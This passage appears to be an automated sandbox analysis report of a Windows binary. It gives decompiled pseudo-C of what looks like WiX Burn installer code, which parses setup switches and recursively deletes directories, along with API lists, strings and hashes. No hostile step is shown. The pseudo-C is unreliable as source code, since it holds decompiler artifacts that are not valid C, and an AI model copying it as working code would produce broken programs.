                                                                                                                                                                  																											_push("Must specify the embedded name, token and parent process id.");
                                                                                                                                                                  																											L127:
                                                                                                                                                                  																											_t405 = _t411;
                                                                                                                                                                  																											_push(_t411);
                                                                                                                                                                  																											goto L104;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										_t380 = _t379 + 1;
                                                                                                                                                                  																										 *_a20 = _t388;
                                                                                                                                                                  																										_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a16);
                                                                                                                                                                  																										if(_t405 >= 0) {
                                                                                                                                                                  																											L70:
                                                                                                                                                                  																											_t379 = _t380 + 2;
                                                                                                                                                                  																											goto L117;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										_push("Failed to parse embedded connection.");
                                                                                                                                                                  																										goto L103;
                                                                                                                                                                  																									}
                                                                                                                                                                  																									_t109 = _t379 + 3; // 0x402286
                                                                                                                                                                  																									_t341 = _t109;
                                                                                                                                                                  																									if(_t109 >= _v8) {
                                                                                                                                                                  																										_t411 = 0x80070057;
                                                                                                                                                                  																										E004300D9(_t341, "core.cpp", 0x434, 0x80070057);
                                                                                                                                                                  																										_push("Must specify the unelevated name, token and parent process id.");
                                                                                                                                                                  																										goto L127;
                                                                                                                                                                  																									}
                                                                                                                                                                  																									_t380 = _t379 + 1;
                                                                                                                                                                  																									 *_a28 = 1;
                                                                                                                                                                  																									_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a12);
                                                                                                                                                                  																									if(_t405 >= 0) {
                                                                                                                                                                  																										goto L70;
                                                                                                                                                                  																									}
                                                                                                                                                                  																									_push("Failed to parse unelevated connection.");
                                                                                                                                                                  																									goto L103;
                                                                                                                                                                  																								}
                                                                                                                                                                  																								_t101 = _t379 + 3; // 0x402286
                                                                                                                                                                  																								_t346 = _t101;
                                                                                                                                                                  																								if(_t101 >= _v8) {
                                                                                                                                                                  																									_t411 = 0x80070057;
                                                                                                                                                                  																									E004300D9(_t346, "core.cpp", 0x424, 0x80070057);
                                                                                                                                                                  																									_push("Must specify the elevated name, token and parent process id.");
                                                                                                                                                                  																									goto L127;
                                                                                                                                                                  																								}
                                                                                                                                                                  																								_t380 = _t379 + 1;
                                                                                                                                                                  																								 *_a28 = 3;
                                                                                                                                                                  																								_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a12);
                                                                                                                                                                  																								if(_t405 < 0) {
                                                                                                                                                                  																									_push("Failed to parse elevated connection.");
                                                                                                                                                                  																									goto L103;
                                                                                                                                                                  																								}
                                                                                                                                                                  																								goto L70;
                                                                                                                                                                  																							}
                                                                                                                                                                  																							_t379 = _t379 + 1;
                                                                                                                                                                  																							if(_t379 >= _v8) {
                                                                                                                                                                  																								_t411 = 0x80070057;
                                                                                                                                                                  																								E004300D9(_t271, "core.cpp", 0x416, 0x80070057);
                                                                                                                                                                  																								_push("Must specify a path for append log.");
                                                                                                                                                                  																								goto L127;
                                                                                                                                                                  																							}
                                                                                                                                                                  																							_t405 = E00433F88(_a40,  *(_t410 + _t379 * 4), 0);
                                                                                                                                                                  																							if(_t405 < 0) {
                                                                                                                                                                  																								_push("Failed to copy append log file path.");
                                                                                                                                                                  																								goto L103;
                                                                                                                                                                  																							}
                                                                                                                                                                  																							 *_a36 =  *_a36 | 0x00000001;
                                                                                                                                                                  																							goto L117;
                                                                                                                                                                  																						}
                                                                                                                                                                  																						_t405 = E00433F88(_a44, 0x43b580, 0);
                                                                                                                                                                  																						if(_t405 >= 0) {
                                                                                                                                                                  																							goto L117;
                                                                                                                                                                  																						}
                                                                                                                                                                  																						_push("Failed to initialize parent to none.");
                                                                                                                                                                  																						goto L103;
                                                                                                                                                                  																					}
                                                                                                                                                                  																					_t379 = _t379 + 1;
                                                                                                                                                                  																					if(_t379 >= _v8) {
                                                                                                                                                                  																						_t411 = 0x80070057;
                                                                                                                                                                  																						E004300D9(_t265, "core.cpp", 0x405, 0x80070057);
                                                                                                                                                                  																						_push("Must specify a value for parent.");
                                                                                                                                                                  																						goto L127;
                                                                                                                                                                  																					}
                                                                                                                                                                  																					_t405 = E00433F88(_a44,  *(_t410 + _t379 * 4), 0);
                                                                                                                                                                  																					if(_t405 >= 0) {
                                                                                                                                                                  																						goto L117;
                                                                                                                                                                  																					}
                                                                                                                                                                  																					_push("Failed to copy parent.");
                                                                                                                                                                  																					goto L103;
                                                                                                                                                                  																				}
                                                                                                                                                                  																				_t357 = _a24;
                                                                                                                                                                  																				_t401 = 0;
                                                                                                                                                                  																				if( *_t357 != 0) {
                                                                                                                                                                  																					 *_t357 = 2;
                                                                                                                                                                  																				}
                                                                                                                                                                  																				goto L118;
                                                                                                                                                                  																			}
                                                                                                                                                                  																			_t401 = 0;
                                                                                                                                                                  																			 *_a24 = 0;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		goto L118;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t394 = _a8;
                                                                                                                                                                  																	_t401 = 0;
                                                                                                                                                                  																	if( *_t394 != 1) {
                                                                                                                                                                  																		 *_t394 = 5;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L118;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t395 = _a8;
                                                                                                                                                                  																_t401 = 0;
                                                                                                                                                                  																if( *_t395 != 1) {
                                                                                                                                                                  																	 *_t395 = 6;
                                                                                                                                                                  																}
                                                                                                                                                                  																goto L118;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t396 = _a8;
                                                                                                                                                                  															_t401 = 0;
                                                                                                                                                                  															if( *_t396 != 1) {
                                                                                                                                                                  																 *_t396 = 3;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L118;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t397 = _a8;
                                                                                                                                                                  														if( *_t397 != 1) {
                                                                                                                                                                  															 *_t397 = _t403;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t54 = _t379 + 1; // 0x402284
                                                                                                                                                                  														_t404 = _t54;
                                                                                                                                                                  														if(_t404 >= _v8) {
                                                                                                                                                                  															goto L117;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t360 =  *( *(_t410 + 4 + _t379 * 4)) & 0x0000ffff;
                                                                                                                                                                  															if(_t360 == _a4 || _t360 == _v20) {
                                                                                                                                                                  																goto L117;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t379 = _t404;
                                                                                                                                                                  																_t405 = E0043191F(_t397 + 0x24,  *(_t410 + _t379 * 4), 3);
                                                                                                                                                                  																if(_t405 >= 0) {
                                                                                                                                                                  																	goto L117;
                                                                                                                                                                  																}
                                                                                                                                                                  																_push("Failed to copy path for layout directory.");
                                                                                                                                                                  																goto L103;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  													_a8[2] = 2;
                                                                                                                                                                  													goto L117;
                                                                                                                                                                  												}
                                                                                                                                                                  												_a8[2] = 4;
                                                                                                                                                                  												goto L117;
                                                                                                                                                                  											}
                                                                                                                                                                  											_a8[2] = 1;
                                                                                                                                                                  											goto L117;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t398 = _a8;
                                                                                                                                                                  											_t401 = 0;
                                                                                                                                                                  											_t366 = 3;
                                                                                                                                                                  											_t398[1] = _t366;
                                                                                                                                                                  											if(_t398[2] == 0) {
                                                                                                                                                                  												_t398[2] = _t366;
                                                                                                                                                                  											}
                                                                                                                                                                  											goto L118;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(E00433C35(__ecx,  &_v12, L"ignored ", 0) >= 0) {
                                                                                                                                                                  						_t405 = E00433C35(__ecx,  &_v12, _t377, 0);
                                                                                                                                                                  						if(_t405 >= 0) {
                                                                                                                                                                  							_t410 = CommandLineToArgvW(_v12,  &_v8);
                                                                                                                                                                  							_v16 = _t410;
                                                                                                                                                                  							if(_t410 != 0) {
                                                                                                                                                                  								_t188 = _v8;
                                                                                                                                                                  								_t401 = 0;
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t373 = GetLastError();
                                                                                                                                                                  								_t409 =  <=  ? _t373 : _t373 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t405 =  >=  ? 0x80004005 :  <=  ? _t373 : _t373 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								E004300D9(0x80004005, "core.cpp", 0x389, _t405);
                                                                                                                                                                  								_push("Failed to get command line.");
                                                                                                                                                                  								goto L4;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to copy command line.");
                                                                                                                                                                  							goto L4;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to initialize command line.");
                                                                                                                                                                  						L4:
                                                                                                                                                                  						_push(_t405);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						L144:
                                                                                                                                                                  						if(_v12 != 0) {
                                                                                                                                                                  							E004380AB(_v12);
                                                                                                                                                                  						}
                                                                                                                                                                  						return _t405;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}


















































                                                                                                                                                                  0x004108ac
                                                                                                                                                                  0x00410a81
                                                                                                                                                                  0x00410a91
                                                                                                                                                                  0x00410a93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004108c0
                                                                                                                                                                  0x004108ca
                                                                                                                                                                  0x004108ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004108d4
                                                                                                                                                                  0x004108d9
                                                                                                                                                                  0x004108d9
                                                                                                                                                                  0x004108da
                                                                                                                                                                  0x004108da
                                                                                                                                                                  0x00410b03
                                                                                                                                                                  0x00410b03
                                                                                                                                                                  0x00410b08
                                                                                                                                                                  0x00410b0b
                                                                                                                                                                  0x00410b0b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410b08
                                                                                                                                                                  0x004108ac
                                                                                                                                                                  0x00410859
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410859
                                                                                                                                                                  0x00410829
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x004107fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004107fe
                                                                                                                                                                  0x004107d8
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x004107b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004107b5
                                                                                                                                                                  0x00410791
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410791
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410730
                                                                                                                                                                  0x004106de
                                                                                                                                                                  0x004106de
                                                                                                                                                                  0x004106e4
                                                                                                                                                                  0x00410a4f
                                                                                                                                                                  0x00410a5f
                                                                                                                                                                  0x00410a64
                                                                                                                                                                  0x00410a69
                                                                                                                                                                  0x00410a69
                                                                                                                                                                  0x00410a6b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a6b
                                                                                                                                                                  0x004106f0
                                                                                                                                                                  0x004106f1
                                                                                                                                                                  0x004106fc
                                                                                                                                                                  0x00410700
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00410706
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410706
                                                                                                                                                                  0x0041068b
                                                                                                                                                                  0x0041068b
                                                                                                                                                                  0x00410691
                                                                                                                                                                  0x00410a33
                                                                                                                                                                  0x00410a43
                                                                                                                                                                  0x00410a48
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a48
                                                                                                                                                                  0x0041069d
                                                                                                                                                                  0x0041069e
                                                                                                                                                                  0x004106ad
                                                                                                                                                                  0x004106b1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004106b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004106b3
                                                                                                                                                                  0x00410638
                                                                                                                                                                  0x00410638
                                                                                                                                                                  0x0041063e
                                                                                                                                                                  0x00410a17
                                                                                                                                                                  0x00410a27
                                                                                                                                                                  0x00410a2c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a2c
                                                                                                                                                                  0x0041064a
                                                                                                                                                                  0x0041064b
                                                                                                                                                                  0x0041065a
                                                                                                                                                                  0x0041065e
                                                                                                                                                                  0x00410a0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041065e
                                                                                                                                                                  0x004105ed
                                                                                                                                                                  0x004105f1
                                                                                                                                                                  0x004109f1
                                                                                                                                                                  0x00410a01
                                                                                                                                                                  0x00410a06
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a06
                                                                                                                                                                  0x00410604
                                                                                                                                                                  0x00410608
                                                                                                                                                                  0x004109e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004109e7
                                                                                                                                                                  0x00410611
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410611
                                                                                                                                                                  0x004105ba
                                                                                                                                                                  0x004105be
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004105c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004105c4
                                                                                                                                                                  0x00410561
                                                                                                                                                                  0x00410565
                                                                                                                                                                  0x004109c8
                                                                                                                                                                  0x004109d8
                                                                                                                                                                  0x004109dd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004109dd
                                                                                                                                                                  0x00410578
                                                                                                                                                                  0x0041057c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410582
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410582
                                                                                                                                                                  0x0041052a
                                                                                                                                                                  0x0041052d
                                                                                                                                                                  0x00410531
                                                                                                                                                                  0x00410537
                                                                                                                                                                  0x00410537
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410531
                                                                                                                                                                  0x00410502
                                                                                                                                                                  0x00410504
                                                                                                                                                                  0x00410504
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004104b7
                                                                                                                                                                  0x00410481
                                                                                                                                                                  0x00410484
                                                                                                                                                                  0x00410489
                                                                                                                                                                  0x0041048f
                                                                                                                                                                  0x0041048f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410489
                                                                                                                                                                  0x00410449
                                                                                                                                                                  0x0041044c
                                                                                                                                                                  0x00410451

APIs
• CommandLineToArgvW.SHELL32(00401F17,00402283,00401F17,00401F17,00000000,00401F17,ignored ,00000000,00401DDF,00000000,00000000,004021A3,004021A7,00401F17,00402283), ref: 0041010A
• GetLastError.KERNEL32(?,?,00000000), ref: 00410119
• CompareStringW.KERNEL32(0000007F,00000001,00402241,000000FF,004444A4,000000FF,00401DDF,00000000,00000000,004021A3,004021A7), ref: 00410191
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004101B4
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444E8,000000FF), ref: 004101D7
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444EC,000000FF), ref: 004101FA
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0041021D
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,004444FC,000000FF), ref: 00410240
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00410263
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0044450C,000000FF), ref: 00410286
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 004102A9
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 004102CC
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,norestart,000000FF), ref: 00410307
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,forcerestart,000000FF), ref: 00410335
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,promptrestart,000000FF), ref: 00410363
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00410391
• lstrlenW.KERNEL32(-00000002), ref: 004108ED
• lstrlenW.KERNEL32(burn.), ref: 004108FA
• lstrlenW.KERNEL32(burn.), ref: 0041090F
• lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 00410919
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0041092A
• LocalFree.KERNEL32(004021A7,00401DDF,00000000,00000000,004021A3,004021A7,00401F17,00402283,?,?,00000000), ref: 00410B0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
Similarity
• API ID: CompareString$lstrlen$ArgvCommandErrorFreeLastLineLocal
• String ID: -$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy command line.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to get command line.$Failed to initialize command line.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse unelevated connection.$Missing required parameter for switch: %ls$Must specify a path for append log.$Must specify a path for log.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$Must specify the unelevated name, token and parent process id.$burn.$burn.disable.unelevate$burn.elevated$burn.embedded$burn.ignoredependencies$burn.log.append$burn.passthrough$burn.related.addon$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.unelevated$core.cpp$forcerestart$help$ignored $keepaupaused$layout$log$modify$noaupause$norestart$package$parent$parent:none$passive$promptrestart$quiet$repair$silent$uninstall$update
• API String ID: 1440157973-4011892239
• Opcode ID: 3ca8676b315f28125c47b76bfaefeb6e494bb722c605cb360048f9d97ca11d6e
• Instruction ID: f54be766a851fb23ceb8536b9f6bf6779bc39dd5e1cf029d1043179a4b77228e
• Opcode Fuzzy Hash: 3ca8676b315f28125c47b76bfaefeb6e494bb722c605cb360048f9d97ca11d6e
• Instruction Fuzzy Hash: 0C52E671644204BBEB218F48CC86FAB32A5DB55734F748317F275AA2D1C7F8A9C1CA58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
E0043740C(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, unsigned int _a8) {
	signed int _v8;
	short _v528;
	short _v1048;
	short _v1078;
	intOrPtr _v1592;
	intOrPtr _v1594;
	struct _WIN32_FIND_DATAW _v1640;
	signed int _v1644;
	WCHAR* _v1648;
	signed short _v1652;
	signed short _v1656;
	signed int _v1660;
	signed short _v1664;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t63;
	signed char _t77;
	void* _t78;
	signed char _t91;
	signed short _t93;
	long _t95;
	signed short _t96;
	signed short _t97;
	signed short _t99;
	signed short _t100;
	signed short _t101;
	signed short _t104;
	signed short _t105;
	signed short _t107;
	signed short _t110;
	signed short _t111;
	signed short _t113;
	signed short _t115;
	signed short _t119;
	signed short _t120;
	signed short _t121;
	signed short _t122;
	long _t123;
	WCHAR* _t124;
	signed char _t125;
	WCHAR* _t126;
	void* _t127;
	WCHAR* _t128;
	void* _t132;
	void* _t133;
	void* _t134;
	void* _t136;
	signed short _t140;
                                                                                                                                                                  				signed short _t145;
                                                                                                                                                                  				signed short _t148;
                                                                                                                                                                  				signed short _t152;
                                                                                                                                                                  				signed short _t155;
                                                                                                                                                                  				signed short _t158;
                                                                                                                                                                  				signed short _t161;
                                                                                                                                                                  				signed int _t164;
                                                                                                                                                                  
                                                                                                                                                                  				_t134 = __edx;
                                                                                                                                                                  				_t63 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t63 ^ _t164;
                                                                                                                                                                  				_v1660 = _v1660 | 0xffffffff;
                                                                                                                                                                  				_v1656 = _a8 & 0x00000001;
                                                                                                                                                                  				_t124 = _a4;
                                                                                                                                                                  				_v1664 = _a8 >> 0x00000001 & 0x00000001;
                                                                                                                                                                  				_t137 = 0;
                                                                                                                                                                  				_v1644 = _v1644 & 0;
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_v1652 = _a8 >> 0x00000002 & 0x00000001;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v1048);
                                                                                                                                                                  				_v1648 = _t124;
                                                                                                                                                                  				E004267C0(_t124, __ecx, 0x208, 0, __eflags);
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v528);
                                                                                                                                                                  				E004267C0(_t124, __ecx, 0x208, 0, __eflags);
                                                                                                                                                                  				_t77 = GetFileAttributesW(_t124);
                                                                                                                                                                  				_t136 = GetLastError;
                                                                                                                                                                  				_t125 = _t77;
                                                                                                                                                                  				if(_t125 != 0xffffffff) {
                                                                                                                                                                  					L4:
                                                                                                                                                                  					__eflags = _t125 & 0x00000010;
                                                                                                                                                                  					if((_t125 & 0x00000010) == 0) {
                                                                                                                                                                  						_t137 = 0x8000ffff;
                                                                                                                                                                  						L51:
                                                                                                                                                                  						_t78 = _v1660;
                                                                                                                                                                  						__eflags = _t78 - 0xffffffff;
                                                                                                                                                                  						if(_t78 != 0xffffffff) {
                                                                                                                                                                  							FindClose(_t78);
                                                                                                                                                                  						}
                                                                                                                                                                  						L53:
                                                                                                                                                                  						if(_v1644 != 0) {
                                                                                                                                                                  							E004380AB(_v1644);
                                                                                                                                                                  						}
                                                                                                                                                                  						return L004267AF(_t137, _v8 ^ _t164, _t136, _t137);
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t125 & 0x00000001;
                                                                                                                                                                  					_t126 = _v1648;
                                                                                                                                                                  					if((_t125 & 0x00000001) == 0) {
                                                                                                                                                                  						L8:
                                                                                                                                                                  						__eflags = _v1656;
                                                                                                                                                                  						if(_v1656 != 0) {
                                                                                                                                                                  							L10:
                                                                                                                                                                  							__eflags = _v1652;
                                                                                                                                                                  							if(_v1652 == 0) {
                                                                                                                                                                  								L13:
                                                                                                                                                                  								_t137 = E004314A9(_t126, L"*.*",  &_v1644);
                                                                                                                                                                  								__eflags = _t137;
                                                                                                                                                                  								if(_t137 < 0) {
                                                                                                                                                                  									goto L53;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t127 = FindFirstFileW(_v1644,  &_v1640);
                                                                                                                                                                  								_v1660 = _t127;
                                                                                                                                                                  								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                  								if(_t127 != 0xffffffff) {
                                                                                                                                                                  									do {
                                                                                                                                                                  										_t132 = 0x2e;
                                                                                                                                                                  										__eflags = _t132 - _v1640.cFileName;
                                                                                                                                                                  										if(_t132 != _v1640.cFileName) {
                                                                                                                                                                  											L20:
                                                                                                                                                                  											_v1078 = 0;
                                                                                                                                                                  											_t137 = E004314A9(_v1648,  &(_v1640.cFileName),  &_v1644);
                                                                                                                                                                  											__eflags = _t137;
                                                                                                                                                                  											if(_t137 < 0) {
                                                                                                                                                                  												goto L51;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = _v1664;
                                                                                                                                                                  											_t91 = _v1640.dwFileAttributes;
                                                                                                                                                                  											if(_v1664 == 0) {
                                                                                                                                                                  												L25:
                                                                                                                                                                  												__eflags = _v1656;
                                                                                                                                                                  												if(_v1656 == 0) {
                                                                                                                                                                  													goto L35;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _t91 & 0x00000007;
                                                                                                                                                                  												if((_t91 & 0x00000007) == 0) {
                                                                                                                                                                  													L28:
                                                                                                                                                                  													_t100 = DeleteFileW(_v1644);
                                                                                                                                                                  													__eflags = _t100;
                                                                                                                                                                  													if(_t100 != 0) {
                                                                                                                                                                  														goto L35;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v1652 - _t100;
                                                                                                                                                                  													if(_v1652 == _t100) {
                                                                                                                                                                  														_t101 = GetLastError();
                                                                                                                                                                  														__eflags = _t101;
                                                                                                                                                                  														_t145 =  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t97 = 0x80004005;
                                                                                                                                                                  														__eflags = _t145;
                                                                                                                                                                  														_t137 =  >=  ? 0x80004005 : _t145;
                                                                                                                                                                  														_push( >=  ? 0x80004005 : _t145);
                                                                                                                                                                  														_push(0x130);
                                                                                                                                                                  														L45:
                                                                                                                                                                  														_push("dirutil.cpp");
                                                                                                                                                                  														E004300D9(_t97);
                                                                                                                                                                  														goto L51;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t104 = GetTempFileNameW( &_v1048, L"DEL", 0,  &_v528);
                                                                                                                                                                  													__eflags = _t104;
                                                                                                                                                                  													if(_t104 == 0) {
                                                                                                                                                                  														_t105 = GetLastError();
                                                                                                                                                                  														__eflags = _t105;
                                                                                                                                                                  														_t148 =  <=  ? _t105 : _t105 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t97 = 0x80004005;
                                                                                                                                                                  														__eflags = _t148;
                                                                                                                                                                  														_t137 =  >=  ? 0x80004005 : _t148;
                                                                                                                                                                  														_push( >=  ? 0x80004005 : _t148);
                                                                                                                                                                  														_push(0x120);
                                                                                                                                                                  														goto L45;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t107 = MoveFileExW(_v1644,  &_v528, 1);
                                                                                                                                                                  													_push(4);
                                                                                                                                                                  													_push(0);
                                                                                                                                                                  													__eflags = _t107;
                                                                                                                                                                  													if(_t107 == 0) {
                                                                                                                                                                  														_push(_v1644);
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_push( &_v528);
                                                                                                                                                                  													}
                                                                                                                                                                  													MoveFileExW();
                                                                                                                                                                  													goto L35;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t110 = SetFileAttributesW(_v1644, 0x80);
                                                                                                                                                                  												__eflags = _t110;
                                                                                                                                                                  												if(_t110 == 0) {
                                                                                                                                                                  													_t111 = GetLastError();
                                                                                                                                                                  													__eflags = _t111;
                                                                                                                                                                  													_t152 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  													_t97 = 0x80004005;
                                                                                                                                                                  													__eflags = _t152;
                                                                                                                                                                  													_t137 =  >=  ? 0x80004005 : _t152;
                                                                                                                                                                  													_push( >=  ? 0x80004005 : _t152);
                                                                                                                                                                  													_push(0x116);
                                                                                                                                                                  													goto L45;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L28;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = _t91 & 0x00000010;
                                                                                                                                                                  											if((_t91 & 0x00000010) == 0) {
                                                                                                                                                                  												goto L25;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t113 = E0043124A(_t132, _t136,  &_v1644);
                                                                                                                                                                  											_t137 = _t113;
                                                                                                                                                                  											__eflags = _t113;
                                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                                  												goto L51;
                                                                                                                                                                  											}
                                                                                                                                                                  											E0043740C(_t132, _t134, __eflags, _v1644, _a8);
                                                                                                                                                                  											goto L35;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = 0 - _v1594;
                                                                                                                                                                  										if(0 == _v1594) {
                                                                                                                                                                  											goto L35;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t132 - _v1594;
                                                                                                                                                                  										if(_t132 != _v1594) {
                                                                                                                                                                  											goto L20;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = 0 - _v1592;
                                                                                                                                                                  										if(0 == _v1592) {
                                                                                                                                                                  											goto L35;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  										L35:
                                                                                                                                                                  										_t93 = FindNextFileW(_t127,  &_v1640);
                                                                                                                                                                  										__eflags = _t93;
                                                                                                                                                                  									} while (_t93 != 0);
                                                                                                                                                                  									_t95 = GetLastError();
                                                                                                                                                                  									__eflags = _t95 - 0x12;
                                                                                                                                                                  									if(_t95 != 0x12) {
                                                                                                                                                                  										_t96 = GetLastError();
                                                                                                                                                                  										__eflags = _t96;
                                                                                                                                                                  										_t140 =  <=  ? _t96 : _t96 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t97 = 0x80004005;
                                                                                                                                                                  										__eflags = _t140;
                                                                                                                                                                  										_t137 =  >=  ? 0x80004005 : _t140;
                                                                                                                                                                  										_push( >=  ? 0x80004005 : _t140);
                                                                                                                                                                  										_push(0x13d);
                                                                                                                                                                  										goto L45;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t137 = 0;
                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                  									L38:
                                                                                                                                                                  									_t128 = _v1648;
                                                                                                                                                                  									_t99 = RemoveDirectoryW(_t128);
                                                                                                                                                                  									__eflags = _t99;
                                                                                                                                                                  									if(_t99 != 0) {
                                                                                                                                                                  										goto L51;
